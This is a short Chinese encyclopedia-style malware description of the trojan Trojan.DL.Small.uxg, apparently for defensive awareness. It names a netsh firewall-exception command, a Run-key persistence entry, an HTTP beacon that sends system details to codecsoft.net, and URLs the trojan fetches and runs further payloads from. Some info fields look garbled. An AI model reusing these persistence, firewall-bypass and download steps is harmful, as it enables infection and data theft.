Trojan.DL.Small.uxg是一種電腦病毒,該病毒調用命令"netsh firewall set allowedprogram '' 複製自己為%system%\kernels32.exe,並添加以下註冊表鍵值來達到自動運行:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run "System" = %SYSTEM%\KERNELS32.EXE。
基本介紹
- 中文名:Trojan.DL.Small.uxg
- 全名:enable
- 傳播途徑:通過windows的防火牆
- 類型:病毒程式檔案
傳送http請求,將宿主系統的語言、處理器、系統版本等信息發出:http://codecsoft.net/adv/086/adload.php?a1=People's Republic of China&a2=Type of Processor: PENTIUM PRO or ENTIUM II/III&a3=Windows version is 5.0&a4=Build: 2195, Platform ID: 2&a5=notoutpost&table=adv86
啟動多個執行緒並嘗試下載以下等檔案:
http://codecsoft.net/pic/search.jpg
http://codecsoft.net/pic/search.jpg
http://codecsoft.net/pic/tibs.jpg
http://codecsoft.net/pic/proxy.jpg
http://codecsoft.net/pic/winlogon.jpg
用以下等地址下載exe、dll等檔案:
http://codecsoft.net/ew4t54th3t456wt34567.php?adv=86&code1=IN0H&code1=2160
http://codecsoft.net/34gfrfdsfghgretytrer5t65rerfgjh/adv86.php?adv=86&code1=IN0H&code2=2160&code3=
下載的檔案保存為%SYSTEM%\dlh9jkd1q1.exe、%SYSTEM%\dlh9jkd1q2.exe、%SYSTEM%\1.dllb、%SYSTEM%\2.dllb等。啟動下載的exe檔案,並在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run下為每個建立鍵值以便自動運行。
http://hi.baidu.com/zonga
